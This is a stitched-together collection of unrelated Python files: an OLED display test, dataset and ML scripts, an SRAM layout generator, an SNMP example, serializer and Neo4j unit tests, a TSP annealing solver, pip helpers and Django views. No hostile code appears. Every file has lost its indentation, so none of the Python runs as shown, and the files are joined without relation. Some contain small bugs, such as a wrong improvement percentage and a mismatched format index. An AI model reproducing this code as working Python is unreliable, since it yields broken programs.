import msvcrt,random,time
while 1:
for xx in range(display.cursor.height):
for yy in range(len(display.buffer)):
if item=='blink': display.buffer[yy] = 0x80 >> random.randint(0,800) # xx
elif item=='hline': display.buffer[yy] = 0x80 >> xx
elif item=='vline': display.buffer[yy] = 0xff if yy%8==xx else 0
display.page_flush (range(display.cursor.height)) # flush all
# if item!='blink': time.sleep (0.3)
if msvcrt.kbhit(): break
if msvcrt.kbhit():
char = msvcrt.getch()
if char == '0': item = 'blink'
elif char == '1': item = 'vline'
elif char == '2': item = 'hline'
else: break
def test_fonts (fontFilePath):
import sys, glob
flist = glob.glob(fontFilePath+'/*.?tf')
if len(flist)==0: flist = glob.glob(fontFilePath+'*.?tf')
if len(flist)==0: flist = [fontFilePath]
for ffile in flist:
print ffile.split('\\')[-1]
display.font = font8x8(ffile,8)
for yy in range(len(display.font.bitmap)):
for zz in range(8):
display.buffer[yy*8 + zz] = display.font.bitmap[yy][zz]
display.page_flush (range(display.HEIGHT/display.PAGE))
if msvcrt.getch() == 'q':
break
def test_text (text=''):
import msvcrt
# display.font = font8x8('.\\font\\ModernDOS.ttf',8)
# font_path = '/'.join(__file__.replace('\\','/').split('/')[0:-1]) + '/ModernDOS.ttf'
# display.font = font8x8(font_path,8)
display.font = font8x8()
if text != '':
display.puts ('Canyon-Semi\x0d')
display.puts (__file__.replace('\\','/').split('/')[-1] + '\x0d')
display.puts (text, 'right')
char = 0
while char != chr(27):
char = msvcrt.getch()
display.putc (char, TRUE)
def test_only ():
pass
from cynpy.basic import *
if not no_argument ():
# for pp in sys.path: print pp
import i2c
i2cmst = i2c.choose_master ()
# assert i2cmst.probe ()[0]==0x3C, 'SH1106 device not found'
display = sh1106(i2cmst)
if sys.argv[1]=='loop' : test_loop (sys.argv[2])
elif sys.argv[1]=='font' : test_fonts (sys.argv[2])
elif sys.argv[1]=='text' : test_text (sys.argv[2])
elif sys.argv[1]=='type' : test_text ()
elif sys.argv[1]=='test' : test_only ()
else: print "command not recognized"
|
# -*- coding: utf-8 -*-
"""
Count the number of valid sketches in Sketchy database.
Created on Wed Dec 2 10:25:18 2020
@author: lbechberger
"""
import argparse, csv
parser = argparse.ArgumentParser(description='Scan Sketchy labels')
parser.add_argument('input_file', help = 'csv file containing the Sketchy info')
args = parser.parse_args()
count_dict = {}
with open(args.input_file, 'r') as f_in:
reader = csv.DictReader(f_in, delimiter=',')
for row in reader:
cat = row['Category']
if cat not in count_dict:
count_dict[cat] = {'all':0, 'error':0, 'context':0, 'ambiguous':0, 'pose':0}
count_dict[cat]['all'] += 1
count_dict[cat]['error'] += int(row['Error?'])
count_dict[cat]['context'] += int(row['Context?'])
count_dict[cat]['ambiguous'] += int(row['Ambiguous?'])
count_dict[cat]['pose'] += int(row['WrongPose?'])
cats = sorted(count_dict.keys())
print('category,#sketches,#error,#context,#ambiguous,#pose')
for cat in cats:
print('{0},{1},{2},{3},{4},{5}'.format(cat, count_dict[cat]['all'],
count_dict[cat]['error'],
count_dict[cat]['context'],
count_dict[cat]['ambiguous'],
count_dict[cat]['pose'])) |
import argparse
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
import numpy as np
import ray
from ray import tune
from ray.experimental.sgd.tf.tf_trainer import TFTrainer, TFTrainable
NUM_TRAIN_SAMPLES = 1000
NUM_TEST_SAMPLES = 400
def create_config(batch_size):
return {
"batch_size": batch_size,
"fit_config": {
"steps_per_epoch": NUM_TRAIN_SAMPLES // batch_size
},
"evaluate_config": {
"steps": NUM_TEST_SAMPLES // batch_size,
}
}
def linear_dataset(a=2, size=1000):
x = np.random.rand(size)
y = x / 2
x = x.reshape((-1, 1))
y = y.reshape((-1, 1))
return x, y
def simple_dataset(config):
batch_size = config["batch_size"]
x_train, y_train = linear_dataset(size=NUM_TRAIN_SAMPLES)
x_test, y_test = linear_dataset(size=NUM_TEST_SAMPLES)
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
test_dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))
train_dataset = train_dataset.shuffle(NUM_TRAIN_SAMPLES).repeat().batch(
batch_size)
test_dataset = test_dataset.repeat().batch(batch_size)
return train_dataset, test_dataset
def simple_model(config):
model = Sequential([Dense(10, input_shape=(1, )), Dense(1)])
model.compile(
optimizer="sgd",
loss="mean_squared_error",
metrics=["mean_squared_error"])
return model
def train_example(num_replicas=1, batch_size=128, use_gpu=False):
trainer = TFTrainer(
model_creator=simple_model,
data_creator=simple_dataset,
num_replicas=num_replicas,
use_gpu=use_gpu,
verbose=True,
config=create_config(batch_size))
train_stats1 = trainer.train()
train_stats1.update(trainer.validate())
print(train_stats1)
train_stats2 = trainer.train()
train_stats2.update(trainer.validate())
print(train_stats2)
val_stats = trainer.validate()
print(val_stats)
print("success!")
def tune_example(num_replicas=1, use_gpu=False):
config = {
"model_creator": tune.function(simple_model),
"data_creator": tune.function(simple_dataset),
"num_replicas": num_replicas,
"use_gpu": use_gpu,
"trainer_config": create_config(batch_size=128)
}
analysis = tune.run(
TFTrainable,
num_samples=2,
config=config,
stop={"training_iteration": 2},
verbose=1)
return analysis.get_best_config(metric="validation_loss", mode="min")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--address",
required=False,
type=str,
help="the address to use for Ray")
parser.add_argument(
"--num-replicas",
"-n",
type=int,
default=1,
help="Sets number of replicas for training.")
parser.add_argument(
"--use-gpu",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--tune", action="store_true", default=False, help="Tune training")
args, _ = parser.parse_known_args()
ray.init(address=args.address)
if args.tune:
tune_example(num_replicas=args.num_replicas, use_gpu=args.use_gpu)
else:
train_example(num_replicas=args.num_replicas, use_gpu=args.use_gpu)
|
# See LICENSE for licensing information.
#
# Copyright (c) 2016-2019 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
import debug
from tech import drc
import design
from vector import vector
from sram_factory import factory
from globals import OPTS
class tri_gate_array(design.design):
"""
Dynamically generated tri gate array of all bitlines. words_per_row
"""
def __init__(self, columns, word_size, name):
"""Intial function of tri gate array """
super().__init__(name)
debug.info(1, "Creating {0}".format(self.name))
self.columns = columns
self.word_size = word_size
self.words_per_row = int(self.columns / self.word_size)
self.create_netlist()
if not OPTS.netlist_only:
self.create_layout()
def create_netlist(self):
self.add_modules()
self.add_pins()
self.create_array()
def create_layout(self):
self.width = (self.columns / self.words_per_row) * self.tri.width
self.height = self.tri.height
self.place_array()
self.add_layout_pins()
self.add_boundary()
self.DRC_LVS()
def add_modules(self):
self.tri = factory.create(module_type="tri_gate")
self.add_mod(self.tri)
def add_pins(self):
"""create the name of pins depend on the word size"""
for i in range(self.word_size):
self.add_pin("in_{0}".format(i))
for i in range(self.word_size):
self.add_pin("out_{0}".format(i))
for pin in ["en", "en_bar", "vdd", "gnd"]:
self.add_pin(pin)
def create_array(self):
"""add tri gate to the array """
self.tri_inst = {}
for i in range(0,self.columns,self.words_per_row):
name = "Xtri_gate{0}".format(i)
self.tri_inst[i]=self.add_inst(name=name,
mod=self.tri)
index = int(i/self.words_per_row)
self.connect_inst(["in_{0}".format(index),
"out_{0}".format(index),
"en", "en_bar", "vdd", "gnd"])
def place_array(self):
""" Place the tri gate to the array """
for i in range(0,self.columns,self.words_per_row):
base = vector(i*self.tri.width, 0)
self.tri_inst[i].place(base)
def add_layout_pins(self):
for i in range(0,self.columns,self.words_per_row):
index = int(i/self.words_per_row)
in_pin = self.tri_inst[i].get_pin("in")
self.add_layout_pin(text="in_{0}".format(index),
layer="m2",
offset=in_pin.ll(),
width=in_pin.width(),
height=in_pin.height())
out_pin = self.tri_inst[i].get_pin("out")
self.add_layout_pin(text="out_{0}".format(index),
layer="m2",
offset=out_pin.ll(),
width=out_pin.width(),
height=out_pin.height())
# Route both supplies
for n in ["vdd", "gnd"]:
for supply_pin in self.tri_inst[i].get_pins(n):
pin_pos = supply_pin.center()
self.add_via_center(layers=self.m2_stack,
offset=pin_pos)
self.add_layout_pin_rect_center(text=n,
layer="m3",
offset=pin_pos)
width = self.tri.width * self.columns - (self.words_per_row - 1) * self.tri.width
en_pin = self.tri_inst[0].get_pin("en")
self.add_layout_pin(text="en",
layer="m1",
offset=en_pin.ll().scale(0, 1),
width=width,
height=drc("minwidth_m1"))
enbar_pin = self.tri_inst[0].get_pin("en_bar")
self.add_layout_pin(text="en_bar",
layer="m1",
offset=enbar_pin.ll().scale(0, 1),
width=width,
height=drc("minwidth_m1")) |
#
# GETBULK Command Generator
#
# Send a series of SNMP GETBULK requests
# with SNMPv2c, community 'public'
# over IPv4/UDP
# to an Agent at 195.218.195.228:161
# with values non-repeaters = 0, max-repetitions = 25
# for two OIDs in tuple form
# stop on end-of-mib condition for both OIDs
#
# This script performs similar to the following Net-SNMP command:
#
# $ snmpbulkwalk -v2c -c public -C n0 -C r25 -ObentU 195.218.195.228 1.3.6.1.2.1.1 1.3.6.1.4.1.1
#
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import cmdgen
from pysnmp.carrier.asynsock.dgram import udp
# Create SNMP engine instance
snmpEngine = engine.SnmpEngine()
#
# SNMPv2c setup
#
# SecurityName <-> CommunityName mapping
config.addV1System(snmpEngine, 'my-area', 'public')
# Specify security settings per SecurityName (SNMPv1 - 0, SNMPv2c - 1)
config.addTargetParams(snmpEngine, 'my-creds', 'my-area', 'noAuthNoPriv', 1)
#
# Setup transport endpoint and bind it with security settings yielding
# a target name
#
# UDP/IPv4
config.addTransport(
snmpEngine,
udp.domainName,
udp.UdpSocketTransport().openClientMode()
)
config.addTargetAddr(
snmpEngine, 'my-router',
udp.domainName, ('195.218.195.228', 161),
'my-creds'
)
# Error/response receiver
def cbFun(sendRequesthandle, errorIndication, errorStatus, errorIndex,
varBindTable, cbCtx):
if errorIndication:
print(errorIndication)
return # stop on error
if errorStatus:
print('%s at %s' % (
errorStatus.prettyPrint(),
errorIndex and varBindTable[-1][int(errorIndex)-1][0] or '?'
)
)
return # stop on error
for varBindRow in varBindTable:
for oid, val in varBindRow:
print('%s = %s' % (oid.prettyPrint(), val.prettyPrint()))
return True # signal dispatcher to continue walking
# Prepare initial request to be sent
cmdgen.BulkCommandGenerator().sendReq(
snmpEngine,
'my-router',
0, 25, # non-repeaters, max-repetitions
( ((1,3,6,1,2,1,1), None),
((1,3,6,1,4,1,1), None) ),
cbFun
)
# Run I/O dispatcher which would send pending queries and process responses
snmpEngine.transportDispatcher.runDispatcher()
|
from lm_eval import tasks
from pytablewriter import MarkdownTableWriter
writer = MarkdownTableWriter()
writer.headers = ["Task Name", "Train", "Val", "Test", "Metrics"]
values = []
def chk(tf):
if tf:
return '✓'
else:
return ' '
for tname, Task in tasks.TASK_REGISTRY.items():
task = Task()
values.append([tname,chk(task.has_training_docs()),chk(task.has_validation_docs()),chk(task.has_test_docs()),', '.join(task.aggregation().keys())])
writer.value_matrix = values
print(writer.dumps()) |
from wataru.commands.models.base import CommandBase
from wataru.logging import getLogger
import code
logger = getLogger(__name__)
class Console(CommandBase):
def apply_arguments(self, parser):
parser.add_argument('--config-path', action='store', dest='configpath', default='')
def execute(self, namespace):
code.interact(local=globals())
|
from botocore.model import ServiceModel
from nifcloud import serialize
class TestRdbSerializer(object):
rdb_model_metadata = {
"apiVersion": "2013-05-15N2013-12-16",
"endpointPrefix": "rdb",
"protocol": "rdb",
"serviceAbbreviation": "rdb",
"serviceFullName": "NIFCLOUD RDB",
"serviceId": "rdb",
"signatureVersion": "v4",
"uid": "rdb-2013-05-15N2013-12-16"
}
def test_RdbSerializer(self):
rdb_model = {
"metadata": self.rdb_model_metadata,
"operations": {
"RdbOperation": {
"http": {
"method": "POST",
"requestUri": "/"
},
"input": {
"shape": "RdbOperationRequest"
},
"name": "rdbOperation",
"output": {
"shape": "RdbOperationResult"
}
}
},
"shapes": {
"RdbOperationRequest": {
"members": {
"Parameter": {
"locationName": "Parameter",
"shape": "String"
}
},
"name": "RdbOperationRequest",
"type": "structure"
},
"RdbOperationResult": {
"members": {
"Response": {
"locationName": "Response",
"shape": "String"
}
},
"name": "RdbOperationResult",
"type": "structure"
},
"String": {
"name": "String",
"type": "string"
},
}
}
rdb_service_model = ServiceModel(rdb_model)
params = {
"Parameter": "test"
}
rdb_serializer = serialize.RdbSerializer()
res = rdb_serializer.serialize_to_request(
params, rdb_service_model.operation_model("RdbOperation"))
assert res["body"] == {"Action": "RdbOperation", "Parameter": "test", "Version": "2013-05-15N2013-12-16"}
assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
assert res["method"] == "POST"
assert res["query_string"] == ""
assert res["url_path"] == "/"
def test_RdbSerializer_fix_get_metrics_statistics_params(self):
rdb_model = {
"metadata": self.rdb_model_metadata,
"operations": {
"NiftyGetMetricStatistics": {
"http": {
"method": "POST",
"requestUri": "/"
},
"input": {
"shape": "NiftyGetMetricStatisticsRequest"
},
"name": "NiftyGetMetricStatistics",
"output": {
"resultWrapper": "RdbOperationResult",
"shape": "RdbOperationResult"
}
},
},
"shapes": {
"NiftyGetMetricStatisticsRequest": {
"members": {
"Dimensions": {
"locationName": "Dimensions",
"shape": "ListOfRequestDimensions"
},
"EndTime": {
"locationName": "EndTime",
"shape": "TStamp"
},
"MetricName": {
"locationName": "MetricName",
"shape": "String"
},
"StartTime": {
"locationName": "StartTime",
"shape": "TStamp"
}
},
"name": "NiftyGetMetricStatisticsRequest",
"type": "structure"
},
"ListOfRequestDimensions": {
"member": {
"locationName": "member",
"shape": "RequestDimensions"
},
"name": "ListOfRequestDimensions",
"type": "list"
},
"RequestDimensions": {
"members": {
"Name": {
"locationName": "Name",
"shape": "String"
},
"Value": {
"locationName": "Value",
"shape": "String"
}
},
"name": "RequestDimensions",
"required": [
"Name",
"Value"
],
"type": "structure"
},
"RdbOperationResult": {
"members": {
"Response": {
"locationName": "Response",
"shape": "String"
}
},
"name": "RdbOperationResult",
"type": "structure"
},
"String": {
"name": "String",
"type": "string"
},
"TStamp": {
"name": "TStamp",
"type": "timestamp"
}
}
}
rdb_service_model = ServiceModel(rdb_model)
params = {}
rdb_serializer = serialize.RdbSerializer()
res = rdb_serializer.serialize_to_request(
params, rdb_service_model.operation_model("NiftyGetMetricStatistics"))
assert res["body"] == {
"Action": "NiftyGetMetricStatistics",
"Version": "2013-05-15N2013-12-16"
}
assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
assert res["method"] == "POST"
assert res["query_string"] == ""
assert res["url_path"] == "/"
def test_RdbSerializer_fix_get_metrics_statistics_params_MetricName_Dimensions(self):
rdb_model = {
"metadata": self.rdb_model_metadata,
"operations": {
"NiftyGetMetricStatistics": {
"http": {
"method": "POST",
"requestUri": "/"
},
"input": {
"shape": "NiftyGetMetricStatisticsRequest"
},
"name": "NiftyGetMetricStatistics",
"output": {
"resultWrapper": "RdbOperationResult",
"shape": "RdbOperationResult"
}
},
},
"shapes": {
"NiftyGetMetricStatisticsRequest": {
"members": {
"Dimensions": {
"locationName": "Dimensions",
"shape": "ListOfRequestDimensions"
},
"EndTime": {
"locationName": "EndTime",
"shape": "TStamp"
},
"MetricName": {
"locationName": "MetricName",
"shape": "String"
},
"StartTime": {
"locationName": "StartTime",
"shape": "TStamp"
}
},
"name": "NiftyGetMetricStatisticsRequest",
"required": [
"MetricName",
"Dimensions"
],
"type": "structure"
},
"ListOfRequestDimensions": {
"member": {
"locationName": "member",
"shape": "RequestDimensions"
},
"name": "ListOfRequestDimensions",
"type": "list"
},
"RequestDimensions": {
"members": {
"Name": {
"locationName": "Name",
"shape": "String"
},
"Value": {
"locationName": "Value",
"shape": "String"
}
},
"name": "RequestDimensions",
"required": [
"Name",
"Value"
],
"type": "structure"
},
"RdbOperationResult": {
"members": {
"Response": {
"locationName": "Response",
"shape": "String"
}
},
"name": "RdbOperationResult",
"type": "structure"
},
"String": {
"name": "String",
"type": "string"
},
"TStamp": {
"name": "TStamp",
"type": "timestamp"
}
}
}
rdb_service_model = ServiceModel(rdb_model)
params = {
"MetricName": "test_metric_name",
"Dimensions": [
{"Name": "test_dimensions_name", "Value": "test_value"}
]
}
rdb_serializer = serialize.RdbSerializer()
res = rdb_serializer.serialize_to_request(
params, rdb_service_model.operation_model("NiftyGetMetricStatistics"))
assert res["body"] == {
"Action": "NiftyGetMetricStatistics",
"MetricName": "test_metric_name",
"Version": "2013-05-15N2013-12-16",
"Dimensions.member.1.Name": "test_dimensions_name",
"Dimensions.member.1.Value": "test_value"
}
assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
assert res["method"] == "POST"
assert res["query_string"] == ""
assert res["url_path"] == "/"
|
import numpy as np
import random
import networkx as nx
import more_itertools
import matplotlib.pyplot as plt
import geopy.distance as geodesic_dist
from models.distance import get_dist_func
import argparse
def get_fitness(solution_edgelist):
"""
Compute fitness value for solution given by edge list.
Args:
solution_edgelist (list): List of edges representing the
solution
Returns:
(float): Computed fitness value.
"""
return sum(map(lambda el : dist_func(*el), solution_edgelist))
def initial_solution(network, strategy):
"""
Compute initial solution for the TSP problem using specified strategy.
Args:
network (object): Networkx representation of the network.
strategy (str): Method used to construct the initial solution.
Valid values are 'greedy' and 'random'.
Returns:
(tuple): Edge list representing the initial solution and the fitness value
of the initial solution.
"""
# Start with random node.
starting_node = random.choice(list(network.nodes()))
# Initialize list for the solution edge list.
solution_edgelist = []
# Initialize set for nodes not yet part of path.
nodes_free = set(np.array(network.nodes()))
# Set starting node as first node and remove from free nodes.
src = starting_node
nodes_free.remove(src)
# While there are nodes not yet part of path, create path.
while len(nodes_free) > 0:
# If doing greedy search, connect to closest node. Else connect to
# random node.
if strategy == 'greedy':
dst = min(nodes_free, key=lambda x: dist_func(src, x))
elif strategy == 'random':
dst = random.choice(list(nodes_free))
# Append to solution edge list, remove node from set of free nodes
# and make curent last node in path the next source node.
solution_edgelist.append([src, dst])
nodes_free.remove(dst)
src = dst
# Append edge for path from last node back to starting node.
solution_edgelist.append([src, starting_node])
# Compute fitness for initial configuration.
fitness = get_fitness(solution_edgelist)
# Return initial solution as edge list and the fitness of the current
# solution.
return solution_edgelist, fitness
def anneal(network, max_it=1e4, temp=-1.0, temp_min=1.0e-8, alpha=0.995):
"""
Approximate solution to TSP problem on given network using simulated annealing.
Args:
network (object): Networkx representation of the network
max_it (int): Maximum iterations to perform
temp (float): Initial temperature
temp_min (float): Minimum temperature. The procedure is stopped when the
temperature falls below this value
alpha (float): The cooling rate
Returns:
(tuple): The edgelist encoding the solution, the current fitness value, the best found fitness value,
the initial fitness value, the list of accepted edgelists (for animations), the list of temperature values
for each iteration, the list of fitness values for each iteration
"""
# Set starting temperature, stopping temperature, alpha, maximum iterations
# and initialize iterations counter.
curr_temp = np.sqrt(network.number_of_nodes()) if temp == -1.0 else temp
it_count = 0
# Get initial solution using greedy search.
solution_edgelist, initial_fitness = initial_solution(network, strategy='random')
solution_perm = np.array([el[0] for el in solution_edgelist])
solution_length = len(solution_perm)
# Set current fitness and best fitness.
current_fitness = initial_fitness
best_fitness = initial_fitness
# List for storing all accepted states (for animating).
accepted_edgelists = []
# Lists for storing next temperature and next fitness value.
temp_vals = []
fitness_vals = []
# Perform annealing while temperature above minimum and
# maximum number of iterations not achieved.
while curr_temp > temp_min and it_count < max_it:
# Append temperature and fitness value
temp_vals.append(curr_temp)
fitness_vals.append(current_fitness)
# Generate neighbor state.
rnd1 = random.randint(2, solution_length)
rnd2 = random.randint(1, solution_length - rnd1 + 1)
solution_perm[rnd2 : (rnd2 + rnd1)] = np.array(list(reversed(solution_perm[rnd2 : (rnd2 + rnd1)])))
# Evaluate neighbor.
neighbor_edgelist = list(more_itertools.pairwise(np.hstack((solution_perm, solution_perm[0]))))
neighbor_fitness = get_fitness(neighbor_edgelist)
# If neighbor fitness is better, accept. If neighbor fitness worse,
# accept with probability dependent on fitness difference and current temperature.
if neighbor_fitness <= current_fitness:
current_fitness = neighbor_fitness
solution_edgelist = neighbor_edgelist
accepted_edgelists.append(solution_edgelist)
if neighbor_fitness < best_fitness:
best_fitness = neighbor_fitness
else:
# Compute probability of accepting worse state.
p_accept = np.exp(-np.abs(neighbor_fitness - current_fitness)/curr_temp)
if random.random() < p_accept:
current_fitness = neighbor_fitness
solution_edgelist = neighbor_edgelist
accepted_edgelists.append(solution_edgelist)
else:
# Undo permutation if not accepted.
solution_perm[rnd2 : (rnd2 + rnd1)] = np.array(list(reversed(solution_perm[rnd2 : (rnd2 + rnd1)])))
# Increment iteration counter and decrease temperature.
it_count += 1
curr_temp *= alpha
print("current fitness: {0}".format(current_fitness))
print("current iteration: {0}/{1}".format(it_count, max_it))
return solution_edgelist, current_fitness, best_fitness, initial_fitness, accepted_edgelists, temp_vals, fitness_vals
if __name__ == '__main__':
### PARSE ARGUMENTS ###
parser = argparse.ArgumentParser(description='Approximate solution to TSP using simulated annealing.')
parser.add_argument('--num-nodes', type=int, default=30, help='Number of nodes to use')
parser.add_argument('--dist-func', type=str, default='geodesic', choices=['geodesic', 'learned'],
help='Distance function to use')
parser.add_argument('--prediction-model', type=str, default='gboosting', choices=['gboosting', 'rf'],
help='Prediction model to use for learned distance function')
parser.add_argument('--max-it', type=int, default=1e4, help='Maximum iterations to perform')
parser.add_argument('--temp', type=float, default=-1.0, help='Initial temperature')
parser.add_argument('--temp-min', type=float, default=1.0e-8, help='Minimal temperature')
parser.add_argument('--alpha', type=float, default=0.995, help='Cooling rate')
args = parser.parse_args()
#######################
# Parse problem network.
network = nx.read_gpickle('./data/grid_data/grid_network.gpickle')
# Number of nodes to remove from network.
to_remove = network.number_of_nodes() - args.num_nodes
# Remove randomly sampled nodes to get specified number of nodes.
network.remove_nodes_from(random.sample(list(network.nodes), to_remove))
# Get distance function.
dist_func = get_dist_func(network, which=args.dist_func, prediction_model=args.prediction_model)
# Get solution using simulated annealing.
solution_edgelist, current_fitness, best_fitness, initial_fitness, \
accepted_edgelists, temp_vals, fitness_vals = anneal(network, max_it=args.max_it,
temp=args.temp, temp_min=args.temp_min, alpha=args.alpha)
# Save list of edge lists for animation.
np.save('./results/edgelists/edgelist_tsp_sa.npy', list(map(np.vstack, accepted_edgelists)))
nx.write_gpickle(network, './results/networks/network_tsp_sa.gpickle')
# Plot temperature and fitness with respect to iteration.
plt.plot(temp_vals)
plt.xlabel('Iteration')
plt.ylabel('Temperature')
plt.savefig('./results/plots/temperature_tsp_sa.png')
plt.clf()
plt.plot(fitness_vals)
plt.xlabel('Iteration')
plt.ylabel('Fitness')
plt.savefig('./results/plots/fitness_tsp_sa.png')
# Print best solution fitness.
print('Fitness of best found solution: {0:.3f}'.format(best_fitness))
# Print initial best fitness.
print('Fitness of initial solution: {0:.3f}'.format(initial_fitness))
# Print increase in fitness.
print('Fitness value improved by: {0:.3f}%'.format(100*initial_fitness/best_fitness))
|
"""
@file
@brief Helpers for pip
Some links to look:
* `installing_python_packages_programatically.py <https://gist.github.com/rwilcox/755524>`_
* `Calling pip programmatically <http://blog.ducky.io/python/2013/08/22/calling-pip-programmatically/>`_
"""
class PQPipError(Exception):
"""
Any exception raised by one of the following function.
"""
def __init__(self, *args):
"""
@param args either a string 3 strings (cmd, out, err)
"""
if len(args) == 1:
Exception.__init__(self, args[0]) # pragma: no cover
else:
cmd, out, err = args
mes = "CMD:\n{0}\nOUT:\n{1}\n[piperror]\n{2}".format(cmd, out, err)
Exception.__init__(self, mes)
def get_packages_list():
"""
calls ``pip list`` to retrieve the list of packages
"""
from pip._internal.utils.misc import get_installed_distributions
return get_installed_distributions(local_only=True)
def package2dict(pkg):
"""
Extracts information from a package.
@param pkg type *pip._vendor.pkg_resources.Distribution*
@return dictionary
"""
return dict(
version=pkg.version,
project_name=pkg.project_name,
py_version=pkg.py_version,
requires=pkg.requires,
platform=pkg.platform,
extras=pkg.extras,
location=pkg.location)
def get_package_info(name=None, start=0, end=-1):
"""
Calls ``pip show`` to retrieve information about packages.
@param name name of he packages or None to get all of them in a list
@param start start at package n (in list return by @see fn get_packages_list)
@param end end at package n, -1 for all
@return dictionary or list of dictionaries
"""
from pip._internal.commands.show import search_packages_info
if name is None:
res = []
packs = get_packages_list()
if end == -1:
end = len(packs) # pragma: no cover
subp = packs[start:end]
if len(subp) == 0:
raise PQPipError( # pragma: no cover
"No package, start={0}, end={1}, len(subp)={2}, len(packs)={3}".format(
start, end, len(subp), len(packs)))
for cp in subp:
pack = cp.project_name
info = get_package_info(pack)
res.append(info)
if len(res) == 0 and len(subp) > 0:
raise PQPipError( # pragma: no cover
"Empty list, unexpected, start={0}, end={1}, len(subp)={3}".format(
start, end, len(subp)))
return res
res = list(search_packages_info([name]))
if len(res) != 1:
raise PQPipError( # pragma: no cover
"Unexpected number of results {0} for {1}".format(
len(res), name))
return res[0]
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from neo4j.data import DataHydrator
from neo4j.packstream import Structure
# python -m pytest -s -v tests/unit/test_data.py
def test_can_hydrate_node_structure():
hydrant = DataHydrator()
struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
alice, = hydrant.hydrate([struct])
assert alice.id == 123
assert alice.labels == {"Person"}
assert set(alice.keys()) == {"name"}
assert alice.get("name") == "Alice"
def test_hydrating_unknown_structure_returns_same():
hydrant = DataHydrator()
struct = Structure(b'?', "foo")
mystery, = hydrant.hydrate([struct])
assert mystery == struct
def test_can_hydrate_in_list():
hydrant = DataHydrator()
struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
alice_in_list, = hydrant.hydrate([[struct]])
assert isinstance(alice_in_list, list)
alice, = alice_in_list
assert alice.id == 123
assert alice.labels == {"Person"}
assert set(alice.keys()) == {"name"}
assert alice.get("name") == "Alice"
def test_can_hydrate_in_dict():
hydrant = DataHydrator()
struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
alice_in_dict, = hydrant.hydrate([{"foo": struct}])
assert isinstance(alice_in_dict, dict)
alice = alice_in_dict["foo"]
assert alice.id == 123
assert alice.labels == {"Person"}
assert set(alice.keys()) == {"name"}
assert alice.get("name") == "Alice"
|
from django.contrib.auth.hashers import make_password, check_password
from django.core.paginator import Paginator
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.urls import reverse
from api.models import ATUser, Product, Apis, Apitest, Apistep, Bug, Set, Apptest, Appteststep, Webtest, Webteststep
import os
from djcelery.models import PeriodicTask, CrontabSchedule, IntervalSchedule
from api.tasks import ApiTask
def index(request):
return HttpResponse('index')
# 登陆
def login(request):
if request.method == "GET":
data = {
'title': '登陆',
}
return render(request, 'login.html', context=data)
elif request.method == "POST":
username = request.POST.get("username")
password = request.POST.get("password")
users = ATUser.objects.filter(u_username=username)
if users.exists():
user = users.first()
if check_password(password, user.u_password):
request.session['user_id'] = user.id
return redirect(reverse("at:home"))
else:
return redirect(reverse("at:login"))
return redirect(reverse("at:login"))
# 注册
def register(request):
if request.method == 'GET':
data = {
'title': '注册'
}
return render(request, 'register.html', context=data)
elif request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
users = ATUser.objects.filter(u_username=username)
if username == "" or users.exists():
return redirect(reverse('at:register'))
else:
password = make_password(password)
user = ATUser()
user.u_username = username
user.u_password = password
user.save()
return redirect(reverse('at:login'))
return redirect(reverse('at:register'))
# 首页
def home(request):
user_id = request.session.get('user_id')
data = {
'title': '首页',
'username': 'username'
}
if user_id:
user = ATUser.objects.get(id=user_id)
data['username'] = user.u_username
return render(request, 'home.html', context=data)
# 登出
def logout(request):
request.session.flush()
return redirect(reverse('at:login'))
# 产品中心
def product_manage(request):
product_list = Product.objects.all()
paginator = Paginator(product_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '产品中心',
'products': page_object,
}
return render(request, 'product_manage.html', context=data)
# 添加产品
def add_product(request):
if request.method == 'GET':
data = {
'title': '添加产品'
}
return render(request, 'add_product.html', context=data)
elif request.method == 'POST':
product_name = request.POST.get('product_name')
product_desc = request.POST.get('product_desc')
product_er = request.POST.get('product_er')
products = Product.objects.filter(p_product_name=product_name)
if product_name == "" or products.exists():
return redirect(reverse('at:add_product'))
else:
product = Product()
product.p_product_name = product_name
product.p_product_desc = product_desc
product.p_product_er = product_er
product.save()
return redirect(reverse('at:product_manage'))
return redirect(reverse('at:add_product'))
# 编辑产品
def update_product(request):
p_id = request.GET.get('product.id')
product = Product.objects.filter(id=p_id).first()
# p = Product.objects.get(id=p_id)
# products = Product.objects.all()
data = {
'title': '修改产品',
'product': product,
# 'p': p,
}
if request.method == "POST":
product_name = request.POST.get('product_name')
product_desc = request.POST.get('product_desc')
product_er = request.POST.get('product_er')
if product_name == "":
return render(request, 'update_product.html', context=data)
Product.objects.filter(id=p_id).update(
p_product_name=product_name,
p_product_desc=product_desc,
p_product_er=product_er
)
return redirect(reverse('at:product_manage'))
return render(request, 'update_product.html', context=data)
# 删除产品
def product_delete(request):
# pro_id = request.GET.get('product.id')
# Product.objects.filter(id=pro_id).delete()
# return redirect(reverse('at:product_manage'))
product_id = request.GET['product_id']
try:
product = Product.objects.get(id=product_id)
product.delete()
return HttpResponse('1')
except:
return HttpResponse('2')
